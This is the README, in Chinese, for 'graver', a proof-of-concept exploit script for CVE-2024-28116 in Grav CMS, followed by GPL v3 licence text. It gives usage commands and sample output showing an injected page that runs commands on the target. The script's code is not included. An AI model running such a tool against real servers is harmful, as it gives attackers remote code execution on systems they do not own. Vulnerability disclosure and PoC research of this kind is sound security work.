针对 Grav CMS 中已认证的 SSTI+RCE 漏洞(CVE-2024-28116)的概念验证(PoC)脚本。 该脚本会在运行存在漏洞的 Grav CMS 的服务器上创建一个恶意的 RCE 页面。
由于这是一个已认证漏洞,因此需要使用 Grav CMS 编辑者用户的有效凭据(在脚本中硬编码这些凭据)。
以下是该工具的一个使用示例:
# python3 graver.py -t <target_url> -p <target_port>
包含返回输出的简单示例:
# python3 graver.py -t http://www.mygrav.local -p 8000
RCE payload injected, now visit the malicious page at 'http://www.mygrav.local:8000/hacked_r79b?do='

graver 由 Maurizio Siddu 开发
版权所有 (c) 2024 graver
本程序是自由软件:您可以根据自由软件基金会发布的 GNU 通用公共许可证的条款(许可证第 3 版,或(由您选择)任何更高版本)重新分发和/或修改本程序。
本程序的发布是希望它会有用,但不提供任何保证;甚至没有对适销性或特定用途适用性的默示保证。有关更多详细信息,请参阅 GNU 通用公共许可证。
您应该已经随本程序收到一份 GNU 通用公共许可证副本。如果没有,请参见 http://www.gnu.org/licenses/。